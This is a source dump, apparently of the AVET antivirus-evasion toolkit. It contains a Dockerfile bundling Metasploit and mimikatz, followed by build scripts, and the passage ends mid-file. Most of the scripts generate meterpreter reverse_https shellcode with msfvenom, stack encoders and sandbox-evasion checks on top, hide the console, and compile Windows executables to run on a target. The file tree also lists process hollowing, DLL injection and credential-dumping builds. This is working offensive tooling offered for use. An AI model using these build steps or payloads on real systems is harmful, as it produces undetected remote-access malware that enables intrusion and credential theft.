├── CHANGELOG ├── Dockerfile ├── LICENSE ├── README.md ├── avet.py ├── banner.txt ├── build ├── build_40xshikata_revhttpsunstaged_win32.sh ├── build_50xshikata_quiet_revhttps_win32.sh ├── build_50xshikata_revhttps_win32.sh ├── build_asciimsf_fromcmd_revhttps_win32.sh ├── build_asciimsf_revhttps_win32.sh ├── build_avetenc_dynamicfromfile_revhttps_win32.sh ├── build_avetenc_fopen_revhttps_win32.sh ├── build_avetenc_mtrprtrxor_revhttps_win64.sh ├── build_calcfromcmd_50xshikata_revhttps_win32.sh ├── build_calcfrompowersh_50xshikata_revhttps_win32.sh ├── build_checkdomain_rc4_mimikatz.sh ├── build_cpucores_revhttps_win32.sh ├── build_disablewindefpsh_xorfromcmd_revhttps_win64.sh ├── build_dkmc_downloadexecshc_revhttps_win32.sh ├── build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh ├── build_downloadbitsadmin_revhttps_win32.sh ├── build_downloadcertutil_revhttps_win32.sh ├── build_downloadcurl_mtrprtrxor_revhttps_win64.sh ├── build_downloadiexplorer_revhttps_win32.sh ├── build_downloadpsh_revhttps_win32.sh ├── build_downloadsocket_mtrprtrxor_revhttps_win64.sh ├── build_downloadsocket_revhttps_win32.sh ├── build_dynamicfromfile_revhttps_win32.sh ├── build_eval_adversarial_dos.sh ├── build_eval_adversarial_extend.sh ├── build_eval_adversarial_padding.sh ├── build_eval_adversarial_shift.sh ├── build_eval_adversarial_si.sh ├── build_fibonacci_rc4_mimikatz.sh ├── build_fopen_mtrprtrxor_revhttps_win64.sh ├── build_fopen_quiet_revhttps_win32.sh ├── build_fopen_revhttps_win32.sh ├── build_getchar_rc4_mimikatz.sh ├── build_gethostbyname_revhttps_win32.sh ├── build_has_process_exit_revhttps_win32.sh ├── build_hasvmkey_revhttps_win32.sh ├── build_hasvmmac_revtcp_win32.sh ├── build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh ├── build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh ├── build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh ├── build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh ├── 
build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh ├── build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh ├── build_kaspersky_fopen_shellrevtcp_win32.sh ├── build_mimikatz_pe2shc_xorfromcmd_win64.sh ├── build_pause_rc4_mimikatz.sh ├── build_rc4_interactive_pwsh_mimikatz_win64.sh ├── build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh ├── build_rc4_mimikatz_all_evasions.sh ├── build_rc4enc_mimikatz_adversarial_win64.sh ├── build_rc4enc_mimikatz_win64.sh ├── build_sleep_rc4_mimikatz.sh ├── build_sleepbyping_rc4_mimikatz.sh ├── build_timedfibonacci_rc4_mimikatz.sh ├── buildsvc_20xshikata_bindtcp_win32.sh ├── feature_construction.sh ├── global_connect_config.sh ├── global_win32.sh └── global_win64.sh ├── build_script_tester.py ├── images └── pm.png ├── input ├── dummy.txt └── goodware_samples │ └── put_goodware_here.txt ├── output └── dummy.txt ├── requirements.txt ├── setup.sh ├── source ├── avet.c ├── avetsvc.c ├── command_exec │ ├── command_exec.assign │ └── command_exec.include ├── data_utility.h ├── debug_print │ └── debug_print.include ├── decode_payload │ ├── decode_payload.assign │ └── decode_payload.include ├── evasion │ ├── evasion.assign │ └── evasion.include ├── get_command │ ├── get_command.assign │ └── get_command.include ├── get_key │ ├── get_key.assign │ └── get_key.include ├── get_payload │ ├── get_payload.assign │ └── get_payload.include ├── get_payload_info │ ├── get_payload_info.assign │ └── get_payload_info.include ├── implementations │ ├── command_exec │ │ ├── exec_via_cmd.h │ │ ├── exec_via_powershell.h │ │ └── no_command.h │ ├── debug_print │ │ └── debug_print.h │ ├── encoding │ │ ├── avet │ │ │ ├── avet_decoder.h │ │ │ ├── avet_encoder │ │ │ └── sh_format │ │ ├── none │ │ │ └── none_decoder.h │ │ ├── rc4 │ │ │ ├── rc4.h │ │ │ ├── rc4_decoder.h │ │ │ ├── rc4_encoder │ │ │ └── rc4_encoder.c │ │ └── xor │ │ │ ├── xor_decoder.h │ │ │ ├── xor_encoder │ │ │ └── xor_encoder.c │ ├── evasion │ │ ├── 
check_fast_forwarding.h │ │ ├── computation_fibonacci.h │ │ ├── computation_timed_fibonacci.h │ │ ├── evasion_by_sleep.h │ │ ├── fopen_sandbox_evasion.h │ │ ├── get_bios_info.h │ │ ├── get_computer_domain.h │ │ ├── get_cpu_cores.h │ │ ├── get_eventlog.h │ │ ├── get_install_date.h │ │ ├── get_num_processes.h │ │ ├── get_registry_size.h │ │ ├── get_standard_browser.h │ │ ├── get_tickcount.h │ │ ├── get_usb.h │ │ ├── gethostbyname_sandbox_evasion.h │ │ ├── has_background_wp.h │ │ ├── has_folder.h │ │ ├── has_network_drive.h │ │ ├── has_process_exit.h │ │ ├── has_public_desktop.h │ │ ├── has_recent_files.h │ │ ├── has_recycle_bin.h │ │ ├── has_username.h │ │ ├── has_vm_mac.h │ │ ├── has_vm_regkey.h │ │ ├── hide_console.h │ │ ├── interaction_getchar.h │ │ ├── interaction_msg_box.h │ │ ├── interaction_system_pause.h │ │ ├── is_debugger_present.h │ │ └── sleep_by_ping.h │ ├── gen_adversarial_exe │ │ ├── genetic_optimizer.py │ │ ├── malconv │ │ │ ├── __init__.py │ │ │ ├── malconv.py │ │ │ └── pretrained_malconv.pth │ │ └── practical_manipulations │ │ │ ├── __init__.py │ │ │ ├── extend.py │ │ │ ├── full_dos.py │ │ │ ├── padding.py │ │ │ ├── partial_dos.py │ │ │ ├── section_injection.py │ │ │ └── shift.py │ ├── payload_execution_method │ │ ├── exec_shellcode.h │ │ ├── exec_shellcode64.h │ │ ├── exec_shellcode_ASCIIMSF.h │ │ ├── helper_functions │ │ │ ├── helper_functions.h │ │ │ └── helper_functions64.h │ │ ├── hollowing32.h │ │ ├── hollowing64.h │ │ ├── inject_dll.h │ │ └── inject_shellcode.h │ └── retrieve_data │ │ ├── download_bitsadmin.h │ │ ├── download_certutil.h │ │ ├── download_curl.h │ │ ├── download_internet_explorer.h │ │ ├── download_powershell.h │ │ ├── download_socket.h │ │ ├── dynamic_from_file.h │ │ ├── from_command_line_hex.h │ │ ├── from_command_line_raw.h │ │ ├── helper_functions │ │ └── helper_functions.h │ │ ├── no_data.h │ │ ├── static_from_file.h │ │ └── static_from_here.h ├── payload_execution_method │ ├── payload_execution_method.assign │ └── 
payload_execution_method.include └── static_data │ └── static_data.include ├── test_payloads └── exec_calc.c └── tools ├── data_raw_to_c ├── data_raw_to_c └── data_raw_to_c.c ├── generate_key ├── generate_key └── generate_key.c └── sh_format ├── sh_format └── sh_format.c /Dockerfile: -------------------------------------------------------------------------------- 1 | # v0.1 2 | # 3 | # This Dockerfile encapsulates the Metasploit Framework and Avet. 4 | # 5 | # Also included: 6 | # hasherezade/pe_to_shellcode 7 | # Mr-Un1k0d3r/DKMC 8 | # gentilkiwi/mimikatz 9 | # 10 | # To build this run: 11 | # $ sudo docker build -t avet:v0.1 . 12 | # 13 | # To start this: 14 | # $ sudo docker run -it --net=host --env="DISPLAY" --volume="$HOME/.Xauthority:/root/.Xauthority:rw" -v $(pwd):/tools/avet/output avet:v0.1 /bin/bash 15 | # (alias this) 16 | # 17 | # This mounts the current working directory as a Docker volume and attaches it to /avet/output. 18 | # To be safe, choose an empty directory to prevent overwriting files. 
19 | # 20 | # Right now, the only option to configure the build scripts inside the Container 21 | # is using avet.py or with vim/nano/gedit in /avet/build 22 | # You can also install other editors if you like 23 | # 24 | 25 | 26 | FROM debian:buster 27 | 28 | # Preparation 29 | ARG DEBIAN_FRONTEND=noninteractive 30 | 31 | RUN dpkg --add-architecture i386 && apt-get update && apt-get install -y \ 32 | wget \ 33 | curl \ 34 | git \ 35 | unzip \ 36 | jq \ 37 | apt-utils \ 38 | gnupg2 \ 39 | vim \ 40 | nano \ 41 | gedit \ 42 | wine \ 43 | wine32 \ 44 | python \ 45 | python3 \ 46 | mingw-w64 \ 47 | && rm -rf /var/lib/apt/lists/* 48 | 49 | 50 | # For metasploit 51 | RUN echo 'deb http://apt.metasploit.com/ buster main' > /etc/apt/sources.list.d/metasploit-framework.list 52 | RUN wget -O - http://apt.metasploit.com/metasploit-framework.gpg.key | apt-key add - 53 | 54 | RUN apt-get update && apt-get install -y \ 55 | metasploit-framework \ 56 | && rm -rf /var/lib/apt/lists/* 57 | 58 | 59 | # For avet 60 | WORKDIR /tools/avet 61 | COPY . . 
62 | 63 | 64 | # For pe2shc 65 | WORKDIR /tools/pe_to_shellcode 66 | RUN curl -s https://api.github.com/repos/hasherezade/pe_to_shellcode/releases/latest \ 67 | | jq -r '.assets[].browser_download_url' \ 68 | | grep 'pe2shc' \ 69 | | wget -i - 70 | 71 | 72 | # For mimikatz 73 | WORKDIR /tools/mimikatz 74 | RUN curl -s https://api.github.com/repos/gentilkiwi/mimikatz/releases/latest \ 75 | | jq -r '.assets[].browser_download_url' \ 76 | | grep .'zip' \ 77 | | wget -i - \ 78 | && unzip mimikatz_trunk.zip \ 79 | && cp x64/mimikatz.exe /tools/avet/input 80 | 81 | 82 | # For dkmc 83 | WORKDIR /tools 84 | RUN git clone https://github.com/Mr-Un1k0d3r/DKMC.git 85 | 86 | 87 | # configure wine during build 88 | RUN winecfg 89 | 90 | 91 | WORKDIR /tools/avet 92 | -------------------------------------------------------------------------------- /banner.txt: -------------------------------------------------------------------------------- 1 | *** ============================================= *** 2 | 3 | .==,_ 4 | .===,_`\\ 5 | .====,_ ` \\ .====,__ 6 | --- .==-,`~. \\ `:`.__, 7 | --- `~~=-. \\ /^^^ MEEP MEEP 8 | --- `~~=. \\ / 9 | `~. \\ / 10 | ~. \\____./ 11 | `.=====) 12 | ___.--~~~--.__ 13 | ___\\.--~~~ ~~~---.._|/ 14 | ~~~\\\" / 15 | 16 | ________ ___ ___ _____ __________ 17 | |\ __ \|\ \ / /|\ __\ |\___ __\ 18 | \ \ \|\ \ \ \ / / | \ \__ \|__|\ \_| 19 | \ \ __ \ \ \/ / / \ \ _\ \ \ \ 20 | \ \ \ \ \ \ / / \ \ \___ \ \ \ 21 | \ \__\ \__\ \__/ / \ \____\ \ \__\ 22 | \|__|\|__|\|__|/ \|_____| \|__| 23 | 24 | *** ============================================= *** 25 | 26 | -------------------------------------------------------------------------------- /build/build_40xshikata_revhttpsunstaged_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use unstaged meterpreter payload and apply shikata 40 times. 
6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # import feature construction interface 13 | . build/feature_construction.sh 14 | 15 | # import global default lhost and lport values from build/global_connect_config.sh 16 | . build/global_connect_config.sh 17 | 18 | # include script containing the compiler var $win32_compiler 19 | # you can edit the compiler in build/global_win32.sh 20 | # or enter $win32_compiler="mycompiler" here 21 | . build/global_win32.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # don't enable debug output because printing the whole unstaged payload takes a lot of time 32 | # enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter unstaged reverse payload, encoded 40 rounds with shikata_ga_nai 37 | msfvenom -p windows/meterpreter_reverse_https lhost=$LHOST lport=$LPORT extensions=stdapi,priv -e x86/shikata_ga_nai -i 40 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # set shellcode source 40 | set_payload_source static_from_file input/sc_c.txt 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/40xshikata_revhttpsunstaged_win32.exe source/avet.c 54 | strip output/40xshikata_revhttpsunstaged_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | 60 | echo " 61 | # Execute the following command: 62 | # $ 40xshikata_revhttpsunstaged_win32.exe 63 | " 64 | -------------------------------------------------------------------------------- /build/build_50xshikata_quiet_revhttps_win32.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times and hide console window. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # quiet execution / hide console window 40 | add_evasion hide_console 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | # compile to exe file 56 | $win32_compiler -o output/50xshikata_quiet_revhttps_win32.exe source/avet.c 57 | strip output/50xshikata_quiet_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # Execute the following command: 65 | # $ 50xshikata_quiet_revhttps_win32.exe 66 | " 67 | 
-------------------------------------------------------------------------------- /build/build_50xshikata_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # set shellcode source 40 | set_payload_source static_from_file input/sc_c.txt 41 | 42 | # set decoder and crypto key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # enable debug output 53 | enable_debug_print 54 | 55 | # compile to exe file 56 | $win32_compiler -o output/50xshikata_revhttps_win32.exe source/avet.c 57 | strip output/50xshikata_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | echo " 63 | # Execute the following command: 64 | # $ 
50xshikata_revhttps_win32.exe 65 | " 66 | -------------------------------------------------------------------------------- /build/build_asciimsf_fromcmd_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Call the generated output.exe on target, 6 | # delivering the shellcode string in output/sc_alpha_mixed.txt as a command-line argument 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win32_compiler 14 | # you can edit the compiler in build/global_win32.sh 15 | # or enter $win32_compiler="mycompiler" here 16 | . build/global_win32.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # no command preexec 30 | set_command_source no_data 31 | set_command_exec no_command 32 | # enable debug output 33 | enable_debug_print 34 | #CONFIGURATION_END 35 | 36 | 37 | # make meterpreter reverse payload, encoded with msf alpha_mixed 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/alpha_mixed BufferRegister=EAX -a x86 --platform Windows -f raw > output/sc_alpha_mixed.txt 39 | 40 | # set shellcode source 41 | set_payload_source from_command_line_raw 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode_ASCIIMSF 52 | 53 | # compile to exe file 54 | $win32_compiler -ffixed-eax -o output/asciimsf_fromcmd_revhttps_win32.exe source/avet.c 55 | strip 
output/asciimsf_fromcmd_revhttps_win32.exe 56 | 57 | # cleanup 58 | cleanup_techniques 59 | 60 | 61 | echo " 62 | # Call the generated .exe on target delivering the shellcode string in output/sc_alpha_mixed.txt as a command-line argument: 63 | # $ asciimsf_fromcmd_revhttps_win32.exe sc_alpha_mixed.txt 64 | " 65 | -------------------------------------------------------------------------------- /build/build_asciimsf_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use Metasploit's alpha_mixed encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . 
build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug printing 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with msf alpha_mixed 37 | # additionally to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/alpha_mixed -f c -a x86 --platform Windows > input/sc_c.txt 39 | 40 | # add fopen sandbox evasion 41 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 42 | 43 | # set shellcode source 44 | set_payload_source static_from_file input/sc_c.txt 45 | 46 | # set decoder and key source 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode_ASCIIMSF 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/asciimsf_revhttps_win32.exe source/avet.c 58 | strip output/asciimsf_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ asciimsf_revhttps_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_avetenc_dynamicfromfile_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Build the .exe file that loads the payload from a given text file. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . 
build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | # additionally to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 39 | 40 | # Apply AVET encoding via format.sh tool 41 | encode_payload avet input/sc_c.txt output/scenc_raw.txt 42 | 43 | # set shellcode source 44 | set_payload_source dynamic_from_file 45 | 46 | # set decoder and key source 47 | # AVET decoder requires no key 48 | set_decoder avet 49 | set_key_source no_data 50 | 51 | # set payload info source 52 | set_payload_info_source no_data 53 | 54 | # set shellcode binding technique 55 | set_payload_execution_method exec_shellcode 56 | 57 | # compile to exe file 58 | $win32_compiler -o output/avetenc_dynamicfromfile_revhttps_win32.exe source/avet.c 59 | strip output/avetenc_dynamicfromfile_revhttps_win32.exe 60 | 61 | # cleanup 62 | cleanup_techniques 63 | 64 | 65 | echo " 66 | # Call the generated executable like: 67 | # $ avetenc_dynamicfromfile_revhttps_win32.exe scenc_raw.txt 68 | " 69 | -------------------------------------------------------------------------------- /build/build_avetenc_fopen_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use AVET encoding. 
6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # encode the shellcode via AVET encoding. 
40 | encode_payload avet input/sc_c.txt input/scenc_raw.txt 41 | 42 | # add fopen sandbox evasion 43 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 44 | 45 | # convert encoded shellcode file to c array style for static include 46 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 47 | 48 | # set shellcode source 49 | set_payload_source static_from_file input/scenc_c.txt 50 | 51 | # set decoder and key source 52 | # AVET decoder needs no key 53 | set_decoder avet 54 | set_key_source no_data 55 | 56 | # set payload info source 57 | set_payload_info_source no_data 58 | 59 | # set shellcode binding technique 60 | set_payload_execution_method exec_shellcode 61 | 62 | # compile to exe file 63 | $win32_compiler -o output/avetenc_fopen_revhttps_win32.exe source/avet.c 64 | strip output/avetenc_fopen_revhttps_win32.exe 65 | 66 | # cleanup 67 | cleanup_techniques 68 | 69 | 70 | echo " 71 | # Execute the following command: 72 | # $ avetenc_fopen_revhttps_win32.exe 73 | " 74 | -------------------------------------------------------------------------------- /build/build_avetenc_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Execute 64-bit shellcode. 6 | # Uses XOR encoder from metasploit, as well as AVET encoding. 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win64_compiler 14 | # you can edit the compiler in build/global_win64.sh 15 | # or enter $win64_compiler="mycompiler" here 16 | . build/global_win64.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . 
build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # no command preexec 30 | set_command_source no_data 31 | set_command_exec no_command 32 | # enable debug output 33 | enable_debug_print 34 | #CONFIGURATION_END 35 | 36 | 37 | # make meterpreter reverse payload 38 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f c --platform Windows > input/sc_c.txt 39 | 40 | # Apply AVET encoding 41 | encode_payload avet input/sc_c.txt input/scenc_raw.txt 42 | 43 | # convert to c array format for static include 44 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 45 | 46 | # set shellcode source 47 | set_payload_source static_from_file input/scenc_c.txt 48 | 49 | # set decoder and key source 50 | # AVET decoder requires no key 51 | set_decoder avet 52 | set_key_source no_data 53 | 54 | # set payload info source 55 | set_payload_info_source no_data 56 | 57 | # set shellcode binding technique 58 | set_payload_execution_method exec_shellcode64 59 | 60 | # call make_avet, compile 61 | $win64_compiler -o output/avetenc_mtrprtrxor_revhttps_win64.exe source/avet.c 62 | strip output/avetenc_mtrprtrxor_revhttps_win64.exe 63 | 64 | # cleanup 65 | cleanup_techniques 66 | 67 | 68 | echo " 69 | # Execute the following command: 70 | # $ avetenc_mtrprtrxor_revhttps_win64.exe 71 | " 72 | -------------------------------------------------------------------------------- /build/build_calcfromcmd_50xshikata_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times. 6 | # Preexecute calc.exe before actual payload. 
7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win32_compiler 14 | # you can edit the compiler in build/global_win32.sh 15 | # or enter $win32_compiler="mycompiler" here 16 | . build/global_win32.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # enable debug output 30 | enable_debug_print 31 | #CONFIGURATION_END 32 | 33 | 34 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 35 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 36 | 37 | # set command source 38 | set_command_source static_from_here "calc.exe" 39 | 40 | # set command execution method 41 | set_command_exec exec_via_cmd 42 | 43 | # set shellcode source 44 | set_payload_source static_from_file input/sc_c.txt 45 | 46 | # set decoder and crypto key source 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/calcfromcmd_50xshikata_revhttps_win32.exe source/avet.c 58 | strip output/calcfromcmd_50xshikata_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ calcfromcmd_50xshikata_revhttps_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_calcfrompowersh_50xshikata_revhttps_win32.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times. 6 | # Preexecute calc.exe via powershell before actual payload. 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win32_compiler 14 | # you can edit the compiler in build/global_win32.sh 15 | # or enter $win32_compiler="mycompiler" here 16 | . build/global_win32.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # enable debug output 30 | enable_debug_print 31 | #CONFIGURATION_END 32 | 33 | 34 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 35 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 36 | 37 | # set command source 38 | set_command_source static_from_here "calc.exe" 39 | 40 | # set command execution method 41 | set_command_exec exec_via_powershell 42 | 43 | # set shellcode 